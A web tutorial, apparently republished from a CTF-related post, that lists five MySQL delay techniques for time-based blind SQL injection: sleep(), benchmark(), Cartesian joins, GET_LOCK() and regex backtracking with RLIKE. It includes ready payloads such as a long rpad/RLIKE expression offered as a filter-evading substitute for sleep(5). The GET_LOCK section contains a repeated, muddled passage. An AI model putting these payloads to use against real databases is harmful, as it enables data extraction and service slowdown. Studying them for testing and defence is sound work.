Five delay methods for MySQL time blind injection

Five delay methods for MySQL time blind injection (PWNHUB unexpected solution)

Delay injection function

Five: sleep(), benchmark(t,exp), Cartesian product, GET_LOCK() RLIKE regularization

sleep()

sleep(x)
select sleep(5);

benchmark() repeatedly executes an expression

 benchmark(t,exp)
     select benchmark(count,expr) is to repeatedly execute the expr expression count times, which makes the processing time very long to generate delay.
     For example, select benchmark(1000000,encode("hello","good"));
     select benchmark( 5000000, md5( 'test' ));​

Cartesian Product

Cartesian product (because joining tables is a time-consuming operation)
     AxB = the set consisting of every combination of elements in A and B, which is the join tableSELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
     select * from table_name A, table_name B
     select * from table_name A, table_name B，table_name C
     select count(*) from table_name A, table_name B, table_name C The table can be the same table

GET_LOCK() Lock

GET_LOCK(key,timeout) requires two connection sessions
RELEASE_LOCK(key) Whether the lock is released, return 1 if released
IS_FREE_LOCK(key) returns the current connection ID, indicating that the lock named 'xxxx' is being used.
key is the name of the lock, timeout is the waiting time for locking, if the lock is not successfully acquired within the time, the event will be rolled back. get_lock returns 1 if the lock is successfully added.
This lock is at the application level and is used between different MySQL sessions. It is a name lock, not a lock on a specific table name or field. What is locked is entirely up to the application. It is an exclusive lock, which means that whichever session holds the lock, other sessions will fail when trying to get the lock.
session A select get_lock('test',1);
session B select get_lock('test',5);
You can specify a table or not. The lock will not be released until the connection session is closed. However, unlike redis, the lock will remain in place as long as it is not released actively.
But after session 1 get_lock, it is not released. Session 2 does not get_lock the same key, or does not get_lock, and can still perform any operation on the data. Therefore, locking is just a subjective desire to allow only one connection to perform certain operations at the same time. If other connections do not call get_lock to add the same lock, they will not be affected and can do whatever they want.

session1

session2

get_lock: However, after session 1 gets_lock, it is not released. Session 2 does not get_lock the same key, or does not get_lock, and can still perform any operation on the data. Therefore, locking is just a subjective desire to allow only one connection to perform certain operations at the same time. If other connections do not call get_lock to add the same lock, they will not be affected and can do whatever they want.

session1

session2

Advantages and disadvantages analysis (1) This method is more effective for updating all columns, but the query statement must also be executed within the lock; (2) This method will automatically release the lock when the client is disconnected for no reason, which is better. Unlike the redis lock, if the lock is disconnected after adding it, the lock will remain; (3) This method locks all operations within the lock, not a specific table or a specific row, so different operations using the same key will share the same lock, which will lead to low efficiency; (4) If the query statement is placed before the lock, the data may be old, and the update will overwrite the data updated by other clients after the query and before the update;

RLIKE REGEXP regular matching

Use rpad or repeat to construct a long string and add a pattern that requires a lot of calculation. The delay length can be controlled by the repeat parameter.

select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');

Regular syntax:
. : matches any single character
*: matches 0 or more of the previous character
[]: matches any character in []. [ab]* can match an empty string, a, b, or a string consisting of any number of a's and b's.
^: matches the beginning of a string, such as ^s matches a string starting with s or S.
$: matches the end, such as s$ matches a string ending with s.
{n} : Matches the previous character n times.

RPAD(str,len,padstr)

Right-pad str with the string padstr until its length reaches len characters, and then return str. If str is longer than len', then it will be truncated to len characters.

mysql> SELECT RPAD('hi',5,'?'); -> 'hi???'

repeat(str,times) copies the string times

⭐️Looking for new delay functions

 concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'

The above code is equivalent to sleep(5)

This concludes this article on five delay methods for MySQL time blind injection. For more information about MySQL time blind injection, please search 123WORDPRESS.COM's previous articles or continue to browse the following related articles. I hope you will support 123WORDPRESS.COM in the future!